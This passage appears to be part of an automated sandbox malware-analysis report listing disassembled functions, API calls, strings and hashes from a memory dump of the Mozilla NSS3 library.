Part of subcall function 6CEE10C0: TlsGetValue.KERNEL32(?,6CE88802,00000000,00000008,?,6CE7EF74,00000000), ref: 6CEE10F3
Part of subcall function 6CEE10C0: EnterCriticalSection.KERNEL32(?,?,6CE88802,00000000,00000008,?,6CE7EF74,00000000), ref: 6CEE110C
Part of subcall function 6CEE10C0: PL_ArenaAllocate.NSS3(?,?,?,6CE88802,00000000,00000008,?,6CE7EF74,00000000), ref: 6CEE1141
Part of subcall function 6CEE10C0: PR_Unlock.NSS3(?,?,?,6CE88802,00000000,00000008,?,6CE7EF74,00000000), ref: 6CEE1182
Part of subcall function 6CEE10C0: TlsGetValue.KERNEL32(?,6CE88802,00000000,00000008,?,6CE7EF74,00000000), ref: 6CEE119C

PORT_ArenaAlloc_Util.NSS3(00000000,?,?,?,?,6CF0DC29,?), ref: 6CE8BE96

Part of subcall function 6CEE10C0: PL_ArenaAllocate.NSS3(?,6CE88802,00000000,00000008,?,6CE7EF74,00000000), ref: 6CEE116E

SECITEM_CopyItem_Util.NSS3(?,00000000,00000000,?,?,?,?,?,6CF0DC29,?), ref: 6CE8BEBB

Part of subcall function 6CEDFB60: PORT_ArenaAlloc_Util.NSS3(00000000,E0056800,00000000,?,?,6CED8D2D,?,00000000,?), ref: 6CEDFB85
Part of subcall function 6CEDFB60: memcpy.VCRUNTIME140(00000000,6A1BEBC6,E0056800,?), ref: 6CEDFBB1

PR_SetError.NSS3(FFFFE013,00000000,?,6CF0DC29,?), ref: 6CE8BEDF
PORT_FreeArena_Util.NSS3(?,00000000,?,?,?,6CF0DC29,?), ref: 6CE8BEF3

Memory Dump Source

Source File: 00000000.00000002.1903271898.000000006CE01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE00000, based on PE: true

Associated: 00000000.00000002.1903244859.000000006CE00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903427422.000000006CF9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903468927.000000006CFDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903487981.000000006CFDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903539075.000000006CFE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903563074.000000006CFE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce00000_file.jbxd

Similarity

API ID: ArenaUtil$Alloc_$AllocateArena_Value$CopyCriticalEnterErrorFreeInitItem_LockPoolSectionUnlockcallocmemcpy
String ID:
API String ID: 3111646008-0
Opcode ID: 611ca16d4481621904a0b14d927bf13d40c7ced42e658f035fcec1cf4bf9e4c2
Instruction ID: 2369ac3bafc1dfd97829aff9d7b0b6c27c58459a23482239131f56308507a13b
Opcode Fuzzy Hash: 611ca16d4481621904a0b14d927bf13d40c7ced42e658f035fcec1cf4bf9e4c2
Instruction Fuzzy Hash: D311A571E012095FEB008BA59D41FAE3BB8AB4529CF240028ED0CEB781EB31D909C7B1

Function 6CF13C80 Relevance: 9.1, APIs: 6, Instructions: 68COMMON

Download Yara Rule

APIs

Part of subcall function 6CF15B40: PR_GetIdentitiesLayer.NSS3 ref: 6CF15B56

PR_SetError.NSS3(FFFFE005,00000000), ref: 6CF13D3F

Part of subcall function 6CE8BA90: PORT_NewArena_Util.NSS3(00000800,6CF13CAF,?), ref: 6CE8BABF
Part of subcall function 6CE8BA90: PORT_ArenaAlloc_Util.NSS3(00000000,00000010,?,6CF13CAF,?), ref: 6CE8BAD5
Part of subcall function 6CE8BA90: PORT_ArenaAlloc_Util.NSS3(?,00000001,?,?,?,6CF13CAF,?), ref: 6CE8BB08
Part of subcall function 6CE8BA90: memset.VCRUNTIME140(00000000,00000000,00000001,?,?,?,?,?,6CF13CAF,?), ref: 6CE8BB1A
Part of subcall function 6CE8BA90: SECITEM_CopyItem_Util.NSS3(?,00000000,?,?,?,?,?,?,?,?,?,6CF13CAF,?), ref: 6CE8BB3B

PR_EnterMonitor.NSS3(?), ref: 6CF13CCB

Part of subcall function 6CF49090: TlsGetValue.KERNEL32 ref: 6CF490AB
Part of subcall function 6CF49090: TlsGetValue.KERNEL32 ref: 6CF490C9
Part of subcall function 6CF49090: EnterCriticalSection.KERNEL32 ref: 6CF490E5
Part of subcall function 6CF49090: TlsGetValue.KERNEL32 ref: 6CF49116
Part of subcall function 6CF49090: LeaveCriticalSection.KERNEL32 ref: 6CF4913F

PR_EnterMonitor.NSS3(?), ref: 6CF13CE2
PORT_FreeArena_Util.NSS3(?,00000000), ref: 6CF13CF8
PR_ExitMonitor.NSS3(?), ref: 6CF13D15
PR_ExitMonitor.NSS3(?), ref: 6CF13D2E

Memory Dump Source

Source File: 00000000.00000002.1903271898.000000006CE01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE00000, based on PE: true

Associated: 00000000.00000002.1903244859.000000006CE00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903427422.000000006CF9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903468927.000000006CFDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903487981.000000006CFDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903539075.000000006CFE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903563074.000000006CFE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce00000_file.jbxd

Similarity

API ID: Util$Monitor$EnterValue$Alloc_ArenaArena_CriticalExitSection$CopyErrorFreeIdentitiesItem_LayerLeavememset
String ID:
API String ID: 4030862364-0
Opcode ID: e7ad2b172ce1ebdb6267d86afec6fc76fe1798d5b7f323bf4e9ea9a967b6582e
Instruction ID: aa8def691de110833334e7bfd2cec568e86a6a16998112416a9168706311e1e6
Opcode Fuzzy Hash: e7ad2b172ce1ebdb6267d86afec6fc76fe1798d5b7f323bf4e9ea9a967b6582e
Instruction Fuzzy Hash: A61108B5A246046FE7205A69EC4179BB7F9AB11208F504538E41A8BF21E632E91DC652

Function 6CEDFDF0 Relevance: 9.1, APIs: 6, Instructions: 60memoryCOMMON

Download Yara Rule

APIs

PORT_ArenaAlloc_Util.NSS3(?,0000000C,00000000,?,?), ref: 6CEDFE08

Part of subcall function 6CEE10C0: TlsGetValue.KERNEL32(?,6CE88802,00000000,00000008,?,6CE7EF74,00000000), ref: 6CEE10F3
Part of subcall function 6CEE10C0: EnterCriticalSection.KERNEL32(?,?,6CE88802,00000000,00000008,?,6CE7EF74,00000000), ref: 6CEE110C
Part of subcall function 6CEE10C0: PL_ArenaAllocate.NSS3(?,?,?,6CE88802,00000000,00000008,?,6CE7EF74,00000000), ref: 6CEE1141
Part of subcall function 6CEE10C0: PR_Unlock.NSS3(?,?,?,6CE88802,00000000,00000008,?,6CE7EF74,00000000), ref: 6CEE1182
Part of subcall function 6CEE10C0: TlsGetValue.KERNEL32(?,6CE88802,00000000,00000008,?,6CE7EF74,00000000), ref: 6CEE119C

PORT_ArenaAlloc_Util.NSS3(?,?,?,?,?,?), ref: 6CEDFE1D

Part of subcall function 6CEE10C0: PL_ArenaAllocate.NSS3(?,6CE88802,00000000,00000008,?,6CE7EF74,00000000), ref: 6CEE116E

PORT_Alloc_Util.NSS3(0000000C,00000000,?,?), ref: 6CEDFE29
PORT_Alloc_Util.NSS3(?,?,?,?), ref: 6CEDFE3D
memcpy.VCRUNTIME140(00000000,?,?,?,?,?,?), ref: 6CEDFE62
free.MOZGLUE(00000000,?,?,?,?), ref: 6CEDFE6F

Memory Dump Source

Source File: 00000000.00000002.1903271898.000000006CE01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE00000, based on PE: true

Associated: 00000000.00000002.1903244859.000000006CE00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903427422.000000006CF9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903468927.000000006CFDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903487981.000000006CFDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903539075.000000006CFE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903563074.000000006CFE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce00000_file.jbxd

Similarity

API ID: Alloc_ArenaUtil$AllocateValue$CriticalEnterSectionUnlockfreememcpy
String ID:
API String ID: 660648399-0
Opcode ID: 00e5d093439fcb8ed207153f7f5e0b87df7bd611f56a0ecb75151893e15dad95
Instruction ID: 1949ef0f3077d719bd874531883ff2e7e1c0ac9b1d5ad2529440eaf74d2f9ac8
Opcode Fuzzy Hash: 00e5d093439fcb8ed207153f7f5e0b87df7bd611f56a0ecb75151893e15dad95
Instruction Fuzzy Hash: E911E9B6A002066BEB00CB95DC40A5B73B8AF592ADF358038ED1887B12E735F915C791

Function 6CF8FD90 Relevance: 9.1, APIs: 6, Instructions: 51COMMON

Download Yara Rule

APIs

PR_Lock.NSS3 ref: 6CF8FD9E

Part of subcall function 6CF49BA0: TlsGetValue.KERNEL32(00000000,00000000,?,6CE71A48), ref: 6CF49BB3
Part of subcall function 6CF49BA0: EnterCriticalSection.KERNEL32(?,?,?,?,6CE71A48), ref: 6CF49BC8

PR_WaitCondVar.NSS3(000000FF), ref: 6CF8FDB9

Part of subcall function 6CE6A900: TlsGetValue.KERNEL32(00000000,?,6CFE14E4,?,6CE04DD9), ref: 6CE6A90F
Part of subcall function 6CE6A900: _PR_MD_WAIT_CV.NSS3(?,?,?), ref: 6CE6A94F

PR_Unlock.NSS3 ref: 6CF8FDD4
PR_Lock.NSS3 ref: 6CF8FDF2
PR_NotifyAllCondVar.NSS3 ref: 6CF8FE0D
PR_Unlock.NSS3 ref: 6CF8FE23

Memory Dump Source

Source File: 00000000.00000002.1903271898.000000006CE01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE00000, based on PE: true

Associated: 00000000.00000002.1903244859.000000006CE00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903427422.000000006CF9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903468927.000000006CFDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903487981.000000006CFDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903539075.000000006CFE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903563074.000000006CFE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce00000_file.jbxd

Similarity

API ID: CondLockUnlockValue$CriticalEnterNotifySectionWait
String ID:
API String ID: 3365241057-0
Opcode ID: 4c3da05d0fd8b912b24cfe0048afdf91ef7b6b9ffe809e624803ecad6e4874af
Instruction ID: b9e11e0ad560fa881139196c09ff72107b7e6e5a2c00ed4082b1a7e10b879db5
Opcode Fuzzy Hash: 4c3da05d0fd8b912b24cfe0048afdf91ef7b6b9ffe809e624803ecad6e4874af
Instruction Fuzzy Hash: 63018EB6E10600AFDF854F16FC009467A31AB062687648378E82647BA2E722D928C782

Function 6CE6AE30 Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 231COMMON

Download Yara Rule

APIs

sqlite3_log.NSS3(00000015,%s at line %d of [%.10s],misuse,00029CDD,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6CE6AFDA

Strings

9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6CE6AFC4
misuse, xrefs: 6CE6AFCE
%s at line %d of [%.10s], xrefs: 6CE6AFD3
unable to delete/modify collation sequence due to active statements, xrefs: 6CE6AF5C

Memory Dump Source

Source File: 00000000.00000002.1903271898.000000006CE01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE00000, based on PE: true

Associated: 00000000.00000002.1903244859.000000006CE00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903427422.000000006CF9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903468927.000000006CFDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903487981.000000006CFDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903539075.000000006CFE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903563074.000000006CFE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce00000_file.jbxd

Similarity

API ID: sqlite3_log
String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$misuse$unable to delete/modify collation sequence due to active statements
API String ID: 632333372-924978290
Opcode ID: 66c1b3d20208bb3bf793e41d7ae11dfb4170382e0d856fa7a4c7b6829b890f05
Instruction ID: f06b658b1ffa5ad60199a10c35289f8b8afbb95c247f182f788480efd6ca79e6
Opcode Fuzzy Hash: 66c1b3d20208bb3bf793e41d7ae11dfb4170382e0d856fa7a4c7b6829b890f05
Instruction Fuzzy Hash: 4691E675F912258FDB04CF5AC850BAABBF1BF45318F2945A8E865ABB51C330ED01CB61

Function 6CECFC30 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 156stringCOMMON

Download Yara Rule

APIs

PL_strncasecmp.NSS3(?,pkcs11:,00000007), ref: 6CECFC55
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 6CECFCB2
PR_SetError.NSS3(FFFFE040,00000000), ref: 6CECFDB7
PR_SetError.NSS3(FFFFE09A,00000000), ref: 6CECFDDE

Part of subcall function 6CED8800: TlsGetValue.KERNEL32(?,6CEE085A,00000000,?,6CE88369,?), ref: 6CED8821
Part of subcall function 6CED8800: TlsGetValue.KERNEL32(?,?,6CEE085A,00000000,?,6CE88369,?), ref: 6CED883D
Part of subcall function 6CED8800: EnterCriticalSection.KERNEL32(?,?,?,6CEE085A,00000000,?,6CE88369,?), ref: 6CED8856
Part of subcall function 6CED8800: PR_WaitCondVar.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,00000013,?), ref: 6CED8887
Part of subcall function 6CED8800: PR_Unlock.NSS3(?,?,?,?,6CEE085A,00000000,?,6CE88369,?), ref: 6CED8899

Strings

pkcs11:, xrefs: 6CECFC4F

Memory Dump Source

Source File: 00000000.00000002.1903271898.000000006CE01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE00000, based on PE: true

Associated: 00000000.00000002.1903244859.000000006CE00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903427422.000000006CF9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903468927.000000006CFDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903487981.000000006CFDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903539075.000000006CFE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903563074.000000006CFE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce00000_file.jbxd

Similarity

API ID: ErrorValue$CondCriticalEnterL_strncasecmpSectionUnlockWaitstrcmp
String ID: pkcs11:
API String ID: 362709927-2446828420
Opcode ID: 69d0ddeda3754695c7b634b073b2298e845cfceffca4aa079209ca1625004695
Instruction ID: 2f2423b5873660bfc43cc5021ff3ebdfa0f308832eb60ca312988393d64d54b2
Opcode Fuzzy Hash: 69d0ddeda3754695c7b634b073b2298e845cfceffca4aa079209ca1625004695
Instruction Fuzzy Hash: 335106B5B002129BEB108F64DE40F9A3B75AF4535CF350129DD246BB42EB39E906CB93

Function 6CE0BDA0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 94COMMON

Download Yara Rule

APIs

memcmp.VCRUNTIME140(00000000,?,?), ref: 6CE0BE02

Part of subcall function 6CF39C40: memcmp.VCRUNTIME140(?,00000000,6CE0C52B), ref: 6CF39D53

sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,00014A8E,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6CE0BE9F

Strings

9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6CE0BE89
database corruption, xrefs: 6CE0BE93
%s at line %d of [%.10s], xrefs: 6CE0BE98

Memory Dump Source

Source File: 00000000.00000002.1903271898.000000006CE01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE00000, based on PE: true

Associated: 00000000.00000002.1903244859.000000006CE00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903427422.000000006CF9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903468927.000000006CFDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903487981.000000006CFDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903539075.000000006CFE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903563074.000000006CFE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce00000_file.jbxd

Similarity

API ID: memcmp$sqlite3_log
String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
API String ID: 1135338897-598938438
Opcode ID: 63f93c2c46c160ccc0f91657758bb3b7a480e62ea45875a016a838c2cb84b509
Instruction ID: 0be7515cae0cd81063c75ed220fd5982e8a890814a1a920b1b1e73b7101a75eb
Opcode Fuzzy Hash: 63f93c2c46c160ccc0f91657758bb3b7a480e62ea45875a016a838c2cb84b509
Instruction Fuzzy Hash: 61312531F4425E8BC700CF698894AABBBB1BF42318B288554EE585BB42D771ED26C7D0

Function 6CE81EC0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 74timeCOMMON

Download Yara Rule

APIs

DER_DecodeTimeChoice_Util.NSS3(?,?,?,?,?,?,00000000,00000000,?,6CE84C64,?,-00000004), ref: 6CE81EE2

Part of subcall function 6CEE1820: DER_GeneralizedTimeToTime_Util.NSS3(?,?,?,6CE81D97,?,?), ref: 6CEE1836

DER_DecodeTimeChoice_Util.NSS3(?,?,?,?,?,?,?,?,00000000,00000000,?,6CE84C64,?,-00000004), ref: 6CE81F13
DER_DecodeTimeChoice_Util.NSS3(?,?,?,?,?,?,?,?,00000000,00000000,?,6CE84C64,?,-00000004), ref: 6CE81F37
DER_DecodeTimeChoice_Util.NSS3(?,dLl,?,?,?,?,?,?,?,?,00000000,00000000,?,6CE84C64,?,-00000004), ref: 6CE81F53

Strings

dLl, xrefs: 6CE81F2B, 6CE81F51

Memory Dump Source

Source File: 00000000.00000002.1903271898.000000006CE01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE00000, based on PE: true

Associated: 00000000.00000002.1903244859.000000006CE00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903427422.000000006CF9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903468927.000000006CFDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903487981.000000006CFDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903539075.000000006CFE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903563074.000000006CFE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce00000_file.jbxd

Similarity

API ID: TimeUtil$Choice_Decode$GeneralizedTime_
String ID: dLl
API String ID: 3216063065-3939847266
Opcode ID: 337a68ac186e7646a364c61a372aed086b958dd2f9bd5d35fa8548b770712f3c
Instruction ID: 21a6173a69176a7faf12d1ff0f2b87473fd4b34680c58912e1e5b45644d0aff5
Opcode Fuzzy Hash: 337a68ac186e7646a364c61a372aed086b958dd2f9bd5d35fa8548b770712f3c
Instruction Fuzzy Hash: A4218371515205AFC700CFA9DD01A9BB7F9AF89699F10092DE858C3B41F330E559C7A2

Function 6CE70DC0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 51stringCOMMON

Download Yara Rule

APIs

strrchr.VCRUNTIME140(00000000,0000005C,00000000,00000000,00000000,?,6CE70BDE), ref: 6CE70DCB
strrchr.VCRUNTIME140(00000000,0000005C,?,6CE70BDE), ref: 6CE70DEA
_stricmp.API-MS-WIN-CRT-STRING-L1-1-0(00000001,00000001,?,?,?,6CE70BDE), ref: 6CE70DFC
PR_LogPrint.NSS3(%s incr => %d (find lib),?,?,?,?,?,?,?,6CE70BDE), ref: 6CE70E32

Strings

%s incr => %d (find lib), xrefs: 6CE70E2D

Memory Dump Source

Source File: 00000000.00000002.1903271898.000000006CE01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE00000, based on PE: true

Associated: 00000000.00000002.1903244859.000000006CE00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903427422.000000006CF9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903468927.000000006CFDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903487981.000000006CFDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903539075.000000006CFE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903563074.000000006CFE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce00000_file.jbxd

Similarity

API ID: strrchr$Print_stricmp
String ID: %s incr => %d (find lib)
API String ID: 97259331-2309350800
Opcode ID: 1a221e8982e2085fa7d477b7ae54c363f51facd6c70a9e7889504c99bae46363
Instruction ID: e419d5e338b6cb65c9ac866a997f82f4fc3e5be5c76630f2b8c44331f6cd3f17
Opcode Fuzzy Hash: 1a221e8982e2085fa7d477b7ae54c363f51facd6c70a9e7889504c99bae46363
Instruction Fuzzy Hash: 6F01D472B00214AFEB209F259C45E1773BCDF45A09B25486DE909D3B41E762FC18C6E2

Function 6CE19C60 Relevance: 7.8, APIs: 6, Instructions: 262COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?), ref: 6CE19CF2
LeaveCriticalSection.KERNEL32(?), ref: 6CE19D45
EnterCriticalSection.KERNEL32(?), ref: 6CE19D8B
LeaveCriticalSection.KERNEL32(?), ref: 6CE19DDE

Memory Dump Source

Source File: 00000000.00000002.1903271898.000000006CE01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE00000, based on PE: true

Associated: 00000000.00000002.1903244859.000000006CE00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903427422.000000006CF9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903468927.000000006CFDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903487981.000000006CFDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903539075.000000006CFE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903563074.000000006CFE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce00000_file.jbxd

Similarity

API ID: CriticalSection$EnterLeave
String ID:
API String ID: 3168844106-0
Opcode ID: 6a9da0fd6c12c54aeae0a86339f0bf503631711472d6e5b81207fa33fce39e23
Instruction ID: 49de65209939423682e8dca397e780239c677bd2398a8b6ae03b05337bc3d87f
Opcode Fuzzy Hash: 6a9da0fd6c12c54aeae0a86339f0bf503631711472d6e5b81207fa33fce39e23
Instruction Fuzzy Hash: 64A19031F181009BEB88AF65D88977E7776AB4B319F28012DD50647F40DB39E956CB82

Function 6CEA1E70 Relevance: 7.7, APIs: 5, Instructions: 207COMMON

Download Yara Rule

APIs

PR_EnterMonitor.NSS3(?), ref: 6CEA1ECC

Part of subcall function 6CF49090: TlsGetValue.KERNEL32 ref: 6CF490AB
Part of subcall function 6CF49090: TlsGetValue.KERNEL32 ref: 6CF490C9
Part of subcall function 6CF49090: EnterCriticalSection.KERNEL32 ref: 6CF490E5
Part of subcall function 6CF49090: TlsGetValue.KERNEL32 ref: 6CF49116
Part of subcall function 6CF49090: LeaveCriticalSection.KERNEL32 ref: 6CF4913F

TlsGetValue.KERNEL32 ref: 6CEA1EDF
EnterCriticalSection.KERNEL32(?), ref: 6CEA1EEF
PR_ExitMonitor.NSS3(?), ref: 6CEA1F37
PR_Unlock.NSS3(?), ref: 6CEA1F44

Memory Dump Source

Source File: 00000000.00000002.1903271898.000000006CE01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE00000, based on PE: true

Associated: 00000000.00000002.1903244859.000000006CE00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903427422.000000006CF9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903468927.000000006CFDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903487981.000000006CFDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903539075.000000006CFE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903563074.000000006CFE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce00000_file.jbxd

Similarity

API ID: Value$CriticalEnterSection$Monitor$ExitLeaveUnlock
String ID:
API String ID: 3539092540-0
Opcode ID: 443ec8daa5815d89df3924ed2902cf9d37f491c7cbbf3a1088eeac6ff798030a
Instruction ID: f6e07dae984f278dffd3967161201309d9f437269dc390d1b11da6383791885b
Opcode Fuzzy Hash: 443ec8daa5815d89df3924ed2902cf9d37f491c7cbbf3a1088eeac6ff798030a
Instruction Fuzzy Hash: EC71CF76904301DFD700CFA5D841A4ABBF1BF88358F24492DE89997B21E731F95ACB92

Function 6CF2DD70 Relevance: 7.7, APIs: 5, Instructions: 179COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32 ref: 6CF2DD8C
LeaveCriticalSection.KERNEL32(00000000), ref: 6CF2DDB4
LeaveCriticalSection.KERNEL32(00000000), ref: 6CF2DE1B
ReleaseSemaphore.KERNEL32(?,00000001,00000000), ref: 6CF2DE77

Memory Dump Source

Source File: 00000000.00000002.1903271898.000000006CE01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE00000, based on PE: true

Associated: 00000000.00000002.1903244859.000000006CE00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903427422.000000006CF9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903468927.000000006CFDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903487981.000000006CFDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903539075.000000006CFE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903563074.000000006CFE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce00000_file.jbxd

Similarity

API ID: CriticalLeaveSection$ReleaseSemaphoreValue
String ID:
API String ID: 2700453212-0
Opcode ID: d9dd5c9355a9554cd02c1f0b11c5284432e6811e41855393e1a6bee44ebc1e02
Instruction ID: 5bf28abc92bbd3789610dc16ceab123996b61a622d4ed43ea9905363eeedd485
Opcode Fuzzy Hash: d9dd5c9355a9554cd02c1f0b11c5284432e6811e41855393e1a6bee44ebc1e02
Instruction Fuzzy Hash: 2E717571A00718CFDB20CFAAC58078AB7B4FF89718F25816DD959AB712D774A941CF90

Function 6CE9DFA0 Relevance: 7.6, APIs: 5, Instructions: 143COMMON

Download Yara Rule

APIs

Part of subcall function 6CE9AB10: DeleteCriticalSection.KERNEL32(D958E852,6CEA1397,5B5F5EC0,?,?,6CE9B1EE,2404110F,?,?), ref: 6CE9AB3C
Part of subcall function 6CE9AB10: free.MOZGLUE(D958E836,?,6CE9B1EE,2404110F,?,?), ref: 6CE9AB49
Part of subcall function 6CE9AB10: DeleteCriticalSection.KERNEL32(5D5E6D09), ref: 6CE9AB5C
Part of subcall function 6CE9AB10: free.MOZGLUE(5D5E6CFD), ref: 6CE9AB63
Part of subcall function 6CE9AB10: DeleteCriticalSection.KERNEL32(0148B821,?,2404110F,?,?), ref: 6CE9AB6F
Part of subcall function 6CE9AB10: free.MOZGLUE(0148B805,?,2404110F,?,?), ref: 6CE9AB76

TlsGetValue.KERNEL32(?,?,6CE9B266,6CEA15C6,?,?,6CEA15C6), ref: 6CE9DFDA
EnterCriticalSection.KERNEL32(?,?,?,6CE9B266,6CEA15C6,?,?,6CEA15C6), ref: 6CE9DFF3
PK11_IsFriendly.NSS3(?,?,?,?,6CE9B266,6CEA15C6,?,?,6CEA15C6), ref: 6CE9E029
PK11_IsLoggedIn.NSS3 ref: 6CE9E046

